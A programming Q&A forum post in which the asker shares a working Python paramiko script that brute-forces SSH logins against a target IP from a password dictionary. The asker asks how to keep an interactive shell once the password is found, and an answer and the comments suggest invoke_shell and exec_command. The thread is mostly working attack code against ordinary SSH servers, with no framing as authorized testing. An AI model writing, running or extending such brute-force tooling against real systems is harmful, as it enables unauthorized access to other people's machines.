# SSH Bruteforce in Python. Script works fine but I'm not getting the shell

Tags: python, ssh, brute-force

I wrote this python script that goes through a password dictionary and tries to do an SSH login on a given IP address. The script is working fine, as it correctly gives the password. But the issue is that I'm not able to retain the SSH shell of the remote machine. I tried to insert some code after performing the `response == 0` check, before the `sys.exit(0)` part, and even by removing `sys.exit(0)`; but none of them have worked so far. I tried to mess around with `subprocess` & `Popen` but still no success. All I want is my program to not exit, but instead give an SSH shell when it hits a correct password.

```
#!/bin/env/ python3

import paramiko, os, sys, socket
from subprocess import Popen, PIPE

global username, pass_file, target_ip

try:
    username = input ("Please enter the username at the target machine> ")
    path = input ("Please enter the path & name of the file containing the passwords> ") 
    if os.path.exists(path) == False:   
        print ("The password file does not exist!")
        sys.exit(1)
    target_ip = input ("Please enter the IP address of the target> ")
    try:
        socket.inet_aton(target_ip)
    except socket.error as e:
        print (e)
        sys.exit(2)
except KeyboardInterrupt:
    print ("\nUser has interrupted the execution!\n")


def ssh_connect(password, ret_code = 0):
    ssh = paramiko.SSHClient()                                      
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        ssh.connect(target_ip, port=22, username=username,password=password)
    except paramiko.AuthenticationException:
        print ("Failed to authenticate! Password: %s" % (password))
        ret_code = 3
    except socket.error as e:
        ret_code = 4

    ssh.close()
    return ret_code

pass_file = open(path, 'r', encoding="ISO-8859-1")                  

for i in pass_file.readlines():
    password = i.strip("\n")

    try:
        response = ssh_connect(password)

        if response == 0:
            print ("Login successful! Password is: %s" % (password))
            # insert function call here
            sys.exit(0) 
        elif response == 1:
            print ("Login failed! Incorrect password: %s " % (password))
        elif response == 2:
            print ("Connection to the target failed!")
            sys.exit(5)

    except Exception as e:
        print (e)
        pass

pass_file.close()
```

Answer (score 0):

Maybe what you want is to input some text to be executed by the ssh terminal ?
Or you can also start an interactive session with `invoke_shell`

```
def ssh_connect(password, ret_code = 0):
    ssh = paramiko.SSHClient()                                      
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        ssh.connect(target_ip, port=22, username=username,password=password)
        cmd = input("type something")  # will wait user input
        # ssh.exec_command(cmd)  # will execute what the user entered
        # or
        ssh.invoke_shell()  # will open an interactive shell
    except paramiko.AuthenticationException:
        print ("Failed to authenticate! Password: %s" % (password))
        ret_code = 3
    except socket.error as e:
        ret_code = 4

    ssh.close()  # maybe don't close it if you want to keep the shell open
    return ret_code
```

Comment: I just want a shell that gets prompted after you successfully SSH into a system. After that I can enter the commands manually or from the script (which I'll try afterwards). But as I said, I want my script to spit out an SSH shell. `ssh.exec_command(cmd)` gave an error `name 'ssh' not defined`.
made `ssh` variable global. then it gives an error message: `'nonetype' object has no attribute 'open_session'`.
I think we should again try to connect after `print ("Login successful! Password is: %s" % (password))` because all we are doing is checking the value of `response`.

Comment: Yeah, you got to rethink the structure of your script, but `ssh.exec_command()` after the `ssh.connect()` Should work. If you want to open a graphical command prompt, ssh.invoke_shell() should do the trick.